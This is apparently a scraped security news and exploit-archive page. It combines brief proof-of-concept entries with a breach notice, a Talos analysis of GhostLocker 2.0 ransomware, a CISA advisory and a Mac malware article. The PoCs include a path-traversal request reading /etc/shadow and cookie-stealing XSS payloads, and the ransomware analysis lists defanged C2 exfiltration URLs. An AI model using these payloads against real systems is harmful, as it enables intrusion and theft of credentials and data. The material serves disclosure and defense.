RT-Thread RTOS versions 5.0.2 and below suffer from multiple buffer overflows, a weak random source in rt_random driver, and various other vulnerabilities.

RT-Thread RTOS 5.0.2 Overflows / Weak Random Source

RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.

    # Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63# Date: 3/2024# CVE: CVE-2019-6268# Exploit Author: Branko MilicevicRAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.Steps to reproduce:Request:GET /../../../../../../../../../../etc/shadow HTTP/1.1Response:HTTP/1.1 200 OKroot:nDnjJ****ydh3:11851:0:99999:7:::bin:*:11851:0:99999:7:::daemon:*:11851:0:99999:7:::adm:*:11851:0:99999:7:::lp:*:11851:0:99999:7:::sync:*:11851:0:99999:7:::shutdown:*:11851:0:99999:7:::Vulnerability TypeDirectory TraversalAttack VectorsUnauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).Referencehttps://www.owasp.org/index.php/Path_Traversal

RAD SecFlow-2 Path Traversal

Solar-Log 200 PM+ version 3.6.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel# Date: 10-30-23# Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security# Vendor Homepage: https://www.solar-log.com/en/# Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019# Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/# CVE: CVE-2023-46344# POC:1. Go to solar panel2. Go to configuration -> Smart Energy -> "drag & drop" button.3. Change "name" to: <xss onmouseenter="alert(document.cookie)"style=display:block>test</xss>4. Once you hover over "test", you get XSS -> if a higher privilegeduser hovers over it, we can get their cookies.

Solar-Log 200 PM+ 3.6.0 Cross Site Scripting

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

**WordPress Neon Text 1.1 Cross Site Scripting**

Posted Mar 5, 2024

Authored by Eren Car

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2023-5817

SHA-256 | f6fa131d3df7c7fa0667803c7757179d6f0f6967ebbb7d6ee2469662460a8a4e

Download | Favorite | View

**WordPress Neon Text 1.1 Cross Site Scripting**

    # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)# Date: 2023-11-15# Exploit Author: Eren Car# Vendor Homepage: https://www.eralion.com/# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.4.1# CVE : CVE-2023-5817# 1. Description:The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.   # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the posts page and create new post.  c. Add shorcode block and insert the following payload:      [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]          d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.

**File Tags**

*   ActiveX (933)
*   Advisory (84,370)
*   Arbitrary (16,579)
*   BBS (2,859)
*   Bypass (1,818)
*   CGI (1,032)
*   Code Execution (7,578)
*   Conference (687)
*   Cracker (844)
*   CSRF (3,370)
*   DoS (24,373)
*   Encryption (2,381)
*   Exploit (52,611)
*   File Inclusion (4,246)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,832)
*   Intrusion Detection (905)
*   Java (3,117)
*   JavaScript (887)
*   Kernel (6,944)
*   Local (14,657)
*   Magazine (586)
*   Overflow (12,989)
*   Perl (1,430)
*   PHP (5,174)
*   Proof of Concept (2,364)
*   Protocol (3,687)
*   Python (1,595)
*   Remote (31,291)
*   Root (3,613)
*   Rootkit (519)
*   Ruby (617)
*   Scanner (1,647)
*   Security Tool (7,962)
*   Shell (3,236)
*   Shellcode (1,217)
*   Sniffer (899)
*   Spoof (2,255)
*   SQL Injection (16,491)
*   TCP (2,420)
*   Trojan (688)
*   UDP (896)
*   Virus (668)
*   Vulnerability (32,461)
*   Web (9,836)
*   Whitepaper (3,768)
*   x86 (966)
*   XSS (18,130)
*   Other

**File Archives**

*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,060)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,978)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,466)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,786)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (15,203)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,336)
*   UNIX (9,371)
*   UnixWare (187)
*   Windows (6,635)
*   Other

WordPress Neon Text 1.1 Cross Site Scripting

KK Star Ratings versions prior to 5.4.6 suffer from rate tampering via a race condition vulnerability.

    # Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via RaceCondition# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/# Date: 2023-11-06# Exploit Author: Mohammad Reza Omrani# Vendor Homepage: https://github.com/kamalkhan# Software Link: https://wordpress.org/plugins/kk-star-ratings/# WPScan :https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/# Version: 5.4.6# Tested on: Wordpress 6.2.2# CVE : CVE-2023-4642# POC:1- Install and activate kk Star Ratings.2- Go to the page that displays the star rating.3- Using Burp and the Turbo Intruder extension, intercept the ratingsubmission.4- Send the request to Turbo Intruder using Action > Extensions > TurboIntruder > Send to turbo intruder.5- Drop the initial request and turn Intercept off.6- In the Turbo Intruder window, add "%s" to the end of the connectionheader (e.g. "Connection: close %s").7- Use the code `examples/race.py`.8- Click "Attack" at the bottom of the window. This will send multiplerequests to the server at the same moment.9- To see the updated total rates, reload the page you tested.

KK Star Ratings Race Condition

American Express has warned affected customers about a breach at a merchant process that leaked account numbers, names, and card expiration dates.

American Express has sent affected customers a warning that “a third party service provider engaged by numerous merchants experienced unauthorized access to its system.”

In a subsequent update, American Express explained that it was not a service provider, but a merchant processor that suffered the breach.

The account information of some card holders may have fallen into the wrong hands. The accessed information includes account numbers, names, and card expiration dates.

Further details about which merchant processor was involved and how, are not available at the time of writing.

American Express said it notified the required regulatory authorities and is alerting impacted customers. The company also told BleepingComputer that if a card member’s credit card is used to make fraudulent purchases, customers won’t be responsible for the charges.

American Express is advising customers to carefully review their account for fraudulent activity. Below are some steps you can take to protect your account.

*   Login to your account at americanexpress.com/MYCA to review your account statements carefully and remain vigilant in doing so, especially over the next 12 to 24 months.
*   If your card is active, sign up to receive instant notifications of potential suspicious activity by enabling Notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts.
*   Make sure American Express has your correct mobile phone number and email address so the company can contact you if needed.
*   If you receive an email relating to American Express that you believe could be fraudulent, immediately forward it to UKemailfraud@americanexpress.com. Do not include your account number in the email.

**Beware of scammers**

Scammers are always on the lookout for data breaches as it presents an opportunity for phishing. There are a few tips to keep in mind.

*   American Express will never ask for sensitive account details by email or phone.
*   Do not install software when asked out of the blue, especially if it reaches you as an email attachment.
*   Scammers will always invoke a feeling of urgency. Don’t let scammers rush you into making wrong decisions.
*   Keep your anti-malware software and security patches up-to-date to prevent fraudsters accessing your details via your computer.
*   If you’re an Android user, be wary of screen overlays on your devices that could capture entered information while you think you are in the actual app. Screen overlays are hard to recognize but on Android you can check **Settings** > **Apps & notifications** \> **Special access** > **Draw over other apps**. (Note that the path may be slightly different depending on your Android version and the phone vendor.) Once there you can review all apps that have the option to “draw over” other apps and see whether or not they have the permission to do so.

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Digital Footprint scan**

If you want to find out how much of your own data is currently exposed online, you can try our free Digital Footprint scan. Fill in your email address (it’s best to submit the one you most frequently use) and we’ll send you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 American Express warns customers about third party data breach 

Cisco Talos observed a surge in GhostSec, a hacking group’s malicious activities since this past year. GhostSec has evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

Tuesday, March 5, 2024 08:00

*   Cisco Talos observed a surge in GhostSec, a hacking group’s malicious activities since this past year.
*   GhostSec has evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.
*   The GhostSec and Stormous ransomware groups are jointly conducting double extortion ransomware attacks on various business verticals in multiple countries. 
*   GhostLocker and Stormous ransomware have started a new ransomware-as-a-service (RaaS) program STMX\_GhostLocker, providing various options for their affiliates. 
*   Talos also discovered two new tools in GhostSec arsenal, the “GhostSec Deep Scan tool” and “GhostPresser,” both likely being used in the attacks against websites.

**Victimology of ransomware attacks**

Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand and Indonesia according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site.  

The collaborative operation affected victims across various business verticals, according to disclosures made by the groups in their Telegram channels.

Talos’ observation in GhostSec’s Telegram channels highlighted the group’s continued attacks on Israel’s Industrial systems, critical infrastructure and technology companies. On Nov. 12, 2023, they claimed that the affected organizations also included the Ministry of Defense in Israel.

Example of GhostSec’s Telegram chat message.

**GhostSec has remained active since this past year**

GhostSec is a hacker group that claims to be one of a modern-day Five Families group that includes ThreatSec, Stormous, Blackforums and SiegedSec on their Telegram channels. GhostSec is financially motivated, conducting single and double extortion attacks on victims across various geographies. They have also conducted several denial-of-service (DoS) attacks and have taken down victims’ websites, according to their Telegram channel messages. Their claims also showed us that their primary focus is raising funds for hacktivists and threat actors through their cybercriminal activities. 

The actor’s name, GhostSec, resembles the well-known hacktivist Ghost Security Group, primarily focusing on counterterrorism efforts and targeting pro-ISIS websites. The Ghost Security Group mentioned in their blog that another hacking group mimics their identity. 

In October 2023, GhostSec announced a new ransomware-as-a-service (RaaS) framework called GhostLocker. After their successful collaborative operations with the Stormous ransomware group in July 2023 against Cuban ministries, on Oct. 14, 2023, the Stormous gang announced that they would use the GhostLocker ransomware program in addition to their StormousX program. 

Stormous ransomware Telegram chat message.

Since then, the GhostSec and Stormous ransomware groups have jointly conducted double extortion ransomware attacks targeting victims across various business verticals in multiple countries. Along with the ransomware attacks, GhostSec seemed to be conducting attacks against corporate websites, including a national railway operator in Indonesia and one of Canada’s leading energy companies. They have likely leveraged their GhostPresser tool along with the cross-site scripting attack technique to compromise the websites. 

On Feb. 24, 2024, Stormous group mentioned on “The Five Families” Telegram channel that they have started their new ransomware-as-a-service (RaaS) program “STMX\_GhostLocker” along with their partners in GhostSec. The new program is made up of three categories of services for the affiliates: paid, free, and another for the individuals without a program who only want to sell or publish data on their blog (PYV service). 

The group has shared their working model flow diagrams for member and non-member affiliates on their Telegram channels.

Stmx\_GhostLocker member affiliate working model.

Stmx\_GhostLocker non-member affiliate working model.

Stormous ransomware and GhostSec have rebuilt the new official blog of their RAAS program Stmx\_GhostLocker on the TOR network, with features for the affiliates to join their program and disclose their victim’s data. Their blog dashboard shows the count of victims and disclosures of victims’ information with a link to their leaked data. They also display the largest ransom as $500,000 USD — we are not sure if that is the highest ransom payment they have received. 

Redacted picture of Stmx\_GhostLocker blog. 

**Evolution of GhostLocker 2.0 ransomware **

In November 2023, GhostSec announced a newer version of their GhostLocker ransomware called GhostLocker 2.0. Recently we observed that they have again started advertising their latest Golang version “GhostLocker 2.0” by calling it “GhostLocker V2” and mentioning their ongoing work on the GhostLocker V3, indicating their continuous evolution in developing their toolset. 

GhostLocker 2.0 encrypts the files on the victim’s machine using the file extension “.ghost” and drops and opens a ransom note. The ransom note has changed from its previous version, where the operator tells users to secure the encryption ID displayed in the ransom note and share it with them in their chat service during the negotiation by clicking “Click me.” The operator also mentions that the victim’s stolen data will be disclosed if they fail to contact them in seven days. 

Ransom Note of GhostLocker (left) and ransom Note of GhostLocker 2.0 (right).

The GhostLocker RAAS has a C2 panel where the affiliates can get an overview of their attacks and gains. When deployed on the victim’s machine, the ransomware binaries will register to the C2 panel, and the affiliates can track the encryption status on the victim’s machine. Talos discovered the GhostLocker 2.0 C2 server with the IP address 94\[.\]103\[.\]91\[.\]246 located in Moscow, Russia. We observed that the geolocation of the C2 server is similar to that of the C2 servers of earlier versions of the GhostLocker ransomware that security researchers at Uptycs reported. 

GhostLocker C2 panels.

GhostLocker RAAS provides its affiliates with the ransomware builder, which contains configuration options, including the mode of persistence that the ransomware binary can establish after being successfully run on the victim machine, target directories to encrypt, and techniques to evade the detections, such as killing the defined processes or services or running the arbitrary command to kill the scheduled task or bypass the User Account Controls (UAC). 

GhostLocker 2.0 ransomware builder panel.

Talos discovered the new variant of GhostLocker ransomware, “GhostLocker 2.0” in the wild on Nov. 15, 2023. The majority of the ransomware functionality of GhostLocker 2.0 remains the same as that of its earlier version GhostLocker, which was written in Python, excluding the watchdog component that the operator had used in earlier versions to start the dropped ransomware binary from the victim’s machine Windows Startup location and the AES encryption key length of 256 bits with that of 128 bits in the earlier version. 

During the initial execution, GhostLocker 2.0 copies itself to the Windows Startup folder to establish persistence. It also generates a random string of 32 bytes and uses the generated string as the filename for its dropped copy in the Windows Startup folder. 

After establishing the persistence, the ransomware establishes the connection to the C2 server through the URL hxxp\[://\]94\[.\]103\[.\]91\[.\]246\[/\]incrementLaunch.

A function that initiates the connection to C2.

After establishing a successful connection with the C2 server, the ransomware generates the secret key and the encryption ID and gathers the victim’s IP address, infection date and other information from its configuration parameters, including encryption status, ransom amount and a victim identifier string, to create a JSON file in the victim’s machine memory.

JSON file generated in the machine’s memory.

The generated JSON file is sent to the C2 server through the URL hxxp\[://\]94\[.\]103\[.\]91\[.\]246\[/\]addInfection to register the victim’s machine infection in the C2 panel.

Function to register the infection to the C2 by sending the JSON file.

After registering the victim’s machine infection with the C2 panel, the ransomware attempts to terminate the defined processes or services or Windows scheduled tasks from its configuration parameters in the victim’s machine to evade detection. 

Functions to stop Windows scheduled tasks. 

GhostLocker 2.0 searches for the target files on the victim’s machine according to the file extension list defined by the threat actor, and before the encryption routine starts, it will upload the target files to the C2 server through the URL “hxxp\[://\]94\[.\]103\[.\]91\[.\]246\[/\]upload” using HTTP post method. In the GhostLocker 2.0 sample we analyzed, the actor has configured the ransomware to exfiltrate and encrypt the files that have file extensions .doc, .docx, .xls and .xlsx. 

Function to exfiltrate the target files to the C2 server. 

After successfully exfiltrating, GhostLocker 2.0 encrypts the targeted files and appends “.ghost” as the file extension for the encrypted files. During the encryption process, GhostLocker 2.0 skips the “C:\\Windows” folder. After completing the encryption routine, the ransomware drops the embedded ransom note to an HTML file with the filename “Ransomnote.html” on the victim’s desktop and launches it using the Windows \`Start\` command. 

A function that drops and opens ransom notes.

Talos’ research uncovered two new tools in GhostSec’s arsenal that the hacking group claimed to have used in compromising legitimate websites. One of them is the “GhostSec Deep Scan toolset” to scan legitimate websites recursively, and another is a hack tool to perform cross-site scripting (XSS) attacks called “GhostPresser.”

The GhostSec deep scan toolset is a Python utility that an attacker can use to scan the websites of their potential targets. 

The tool has several modules to perform the following scans on the targeted websites:

*   Perform a user-specific search. 
*   Scans multiple websites.
*   Extract the hyperlinks on the website. 
*   Performs a deep scan and analyzes the technologies used to build the web page.
*   Scans the security protocols to detect the SSL/TLS and HSTS (HTTP Strict Transport Security).
*   Perform the website content analysis and extract the contents to a file.
*   Performs a WhoIs lookup.
*   Checks for the existence of any broken links in the website.

The tool also contains placeholders to perform specific functions including SSL analysis, DNS lookup, checks for robots.txt and sitemap.xml, CVE scans on the targeted website, and an advanced search based on the file type, date range and the custom criteria of the websites, indicating the GhostSec’s continuous evolution of tools in their arsenal. 

One of the modules that stood out to us is the \`deep\_scan\` function that the actor has defined to parse and scrape information from the targeted web pages and assess the technologies used in the web page. It is done by using the Python libraries Beautiful Soup, a Python package used for parsing data out of HTML and XML files, and the BuiltWith Python library, a Python package used to detect the technology used by a website, such as Apache, JQuery and WordPress. 

A function to parse and identify the technology used in the webpage.

GhostPresser, an admin bypass and hacking tool targeting the WordPress content management system, is a shell script that GhostSec claims to have used in an XSS attack against a legitimate website in Canada. The tool appears to be under enhancement process as we spotted several placeholders in the tool to include functionalities to perform audits on the targeted websites. We are not sure at this moment about what type of audits the threat actor intends to implement in their tool. 

GhostPresser tool.

A threat actor can achieve the following actions after successfully injecting the GhostPresser into a targeted website on WordPress. 

*   Bypass logins and perform actions such as test cookies. 
*   Activate and deactivate a plugin. 
*   Change WordPress settings.
*   Create a new user. 
*   Update WordPress core information. 
*   Functions to install a new theme.

Below is an example of the function in the GhostPresser to install new themes in WordPress.

Function to install new WordPress theme.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 62983-62989, and 300818-300820. 

ClamAV detections are also available for this threat:

Win.Ransomware.GhostSec-10020906-0

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

GhostSec’s joint ransomware operation and evolution of their arsenal

View CSAF
1. EXECUTIVE SUMMARY
CVSS v3 10.0
ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
Vendor: Nice
Equipment: Linear eMerge E3-Series
Vulnerabilities: Path traversal, Cross-site scripting, OS command injection, Unrestricted Upload of File with Dangerous Type, Incorrect Authorization, Exposure of Sensitive Information to an Authorized Actor, Insufficiently Protected Credentials, Use of Hard-coded Credentials, Cross-site Request Forgery, Out-of-bounds Write
2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow a remote attacker to gain full system access.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of Nice Linear eMerge E3-Series are affected:
Linear eMerge E3-Series: versions 1.00-06 and prior
3.2 Vulnerability Overview
3.2.1 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (‘PATH TRAVERSAL') CWE-22
Nice Linear eMerge E3-Series versions 1.00-06 and prior are vulnerable to path traversal. This could allow an attacker to gain unauthorized access to the system and sensitive data.
CVE-2019-7253 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.2 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (‘PATH TRAVERSAL') CWE-22
Versions of Nice Linear eMerge E3-Series firmware 1.00-06 and prior are vulnerable to a file inclusion through path traversal, which could give the attacker access to sensitive information.
CVE-2019-7254 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
3.2.3 IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (‘CROSS-SITE SCRIPTING') CWE-79
Nice Linear eMerge E3-Series versions 1.00-06 and prior are vulnerable to cross-site scripting, which could allow an attacker to obtain and alter some information on the system.
CVE-2019-7255 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).
3.2.4 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND (‘OS COMMAND INJECTION') CWE-78
Nice Linear eMerge E3-Series versions 1.00-06 and prior are vulnerable to OS command injection, which could allow an attacker to cause remote code execution.
CVE-2019-7256 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
3.2.5 UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434
Nice Linear eMerge E3-Series versions 1.00-06 and prior are vulnerable to unrestricted upload of malicious files, which could allow an attacker to execute arbitrary code.
CVE-2019-7257 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
3.2.6 INCORRECT AUTHORIZATION CWE-863
Nice Linear eMerge E3-Series versions 1.00-06 and prior suffer from an authorization mechanism vulnerability. This could allow an attacker to escalate privileges and gain full control of the system.
CVE-2019-7258 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.2.7 EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR CWE-200
An authorization bypass occurs in Nice Linear eMerge E3-Series versions 1.00-06 and prior when an authenticated attacker visits a specific GET request against the target, resulting in disclosure of administrative credentials in clear-text. This allows the attacker to re-login with admin privileges and have full access to the control interface.
CVE-2019-7259 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.2.8 INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522
The application of Nice Linear eMerge E3-Series versions 1.00-06 and prior stores passwords in clear-text in its DBMS system. Storing a password in plaintext may result in a system compromise.
CVE-2019-7260 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.9 USE OF HARD-CODED CREDENTIALS CWE-798
Hard-coded credentials are present in multiple binaries bundled in the Nice Linear eMerge E3-Series versions 1.00-06 and prior firmware OS. These hard-coded credentials typically create a significant hole that could allow an attacker to bypass the authentication configured by the software administrator.
CVE-2019-7261 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.10 USE OF HARD-CODED CREDENTIALS CWE-798
The Nice Linear eMerge E3-Series versions 1.00-06 and prior access control platform has SSH enabled with hardcoded credentials for the root account. This could allow an unauthenticated attacker to initiate a secure connection with highest privileges (root) and gain full system access.
CVE-2019-7265 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.2.11 CROSS-SITE REQUEST FORGERY (CSRF) CWE-352
The application of Nice Linear eMerge E3-Series versions 1.00-06 and prior allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. An attacker could exploit this to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
CVE-2019-7262 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
3.2.12 OUT-OF-BOUNDS WRITE CWE-787
A stack-based buffer overflow exists, affecting several CGI binaries of Nice Linear eMerge E3-Series versions 1.00-06 and prior. The vulnerability is caused due to a boundary error in the processing of a user input, which an attacker could exploit to cause a buffer overflow. Successful exploitation could allow execution of arbitrary code on the affected device.
CVE-2019-7264 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
3.3 BACKGROUND
CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Italy
3.4 RESEARCHER
Gjoko Krstic from Zero Science Lab reported these vulnerabilities to CISA.
4. MITIGATIONS
Nice/Nortek encourages users to upgrade to the latest firmware to mitigate the risk of these vulnerabilities. Please see Nice's E3-Bulletin for more information.
Nice also recommends the following defensive measures to minimize the risk of exploitation of these vulnerabilities:
Minimize network exposure of devices, ensuring they are not accessible from the internet.
Place the devices behind firewalls and isolate them from other networks.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Keep your VPNs as updated as possible.
Change default credentials on the device.
Change the default IP address of the device.
See Nice's Telephone Entry Bulletin for additional information.
Users should contact Nice with any questions.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
5. UPDATE HISTORY
March 5, 2024: Initial Publication

Nice Linear eMerge E3-Series

Last year, 11% of all detections on Macs were caused by malware. The illuminating figure gives a view into the world of Mac cyberthreats.

We’re going to let you in on a little cybersecurity secret… There’s malware on Mac computers. There pretty much always has been.

As revealed in our 2024 ThreatDown State of Malware report, a full 11% of all detections recorded by Malwarebytes on Mac computers in 2023 were for different variants of malware—the catch-all term that cybersecurity researchers use to refer to ransomware, trojans, info stealers, worms, viruses, and more.

That 11% figure may not sound imposing but remember that many people today still believe that Apple devices, including Mac computers, are invulnerable to cyberinfections because of some sort of vague “Apple magic.”

In reality, “Apple magic” is more a byproduct of old advertising (this 2006 commercial from the “I’m a Mac, and I’m a PC” series did irreparable harm) and faulty conclusions concerning cybersecurity’s biggest breaches and attacks: People mistakenly believe that because _most_ attacks target Windows computers and servers, _no_ attacks target Macs.

The truth is far more nuanced, as the visible, overwhelming focus of cyberattacks on Windows machines is a consequence of Microsoft’s long-standing success in business computing.

For decades, every multinational corporation, every local travel agency, every dentist, every hospital, every school, government, and city hall practically ran on Windows. This mass adoption was good for Microsoft and its revenue, but it also drew and maintained the interests of cybercriminals, who would develop malware that could impact the highest number of victims. This is why the biggest attacks, even today, predominantly target Windows-based malware and the sometimes-unpatched vulnerabilities found in Windows software and applications.  

Essentially, as Windows is the biggest target, cybercriminals zero in their efforts respectively.

But new information last year revealed that could all be changing.

****Mac malware tactics shifted in 2023****

Apple’s desktop and laptop operating system, macOS, represents a 31% share of US desktop operating systems, and roughly 25% of all businesses reportedly utilize Mac devices somewhere in their networks.

Already, the cybercriminals have taken note.

In April 2023, the most successful and dangerous ransomware in the world—LockBit—was found to have a variant developed for Mac. Used in at least 1,018 known attacks last year, LockBit ransomware, and the operators behind it, destroyed countless businesses, ruined many organizations, and, according to the US Department of Justice, brought in more than $120 million before being disrupted by a coordinated law enforcement effort in February of this year.

While the LockBit variant for Mac was not operational upon discovery, the LockBit ransomware gang said at the time that it was “actively being developed.” Fortunately, LockBit suffered enormous blows this year, and the ransomware gang is probably less concerned with Mac malware development and more concerned with “avoiding prison.”

Separately, in September 2023, Malwarebytes discovered a cybercriminal campaign that tricked Mac users into accidentally installing a type of malware that can steal passwords, browser data, cookies, files, and cryptocurrency. The malware, called Atomic Stealer (or AMOS for short) was delivered through “malvertising,” a malware delivery tactic that abuses Google ads to send everyday users to malicious websites that—though they may appear legitimate—fool people into downloading malware.

In this campaign, when users searched on Google for the financial marketing trading app “TradingView,” they were sometimes shown a malicious search result that appeared entirely authentic: a website with TradingView branding was visible, and download buttons for Windows, Mac, and Linux were clearly listed.

But users who clicked the Mac download button instead received AMOS.

This malvertising site mimics TradingView to fool users into downloading malware for different operating systems.

Just months later, AMOS again wriggled its way onto Mac computers, this time through a new delivery chain that has more typically targeted Windows users.

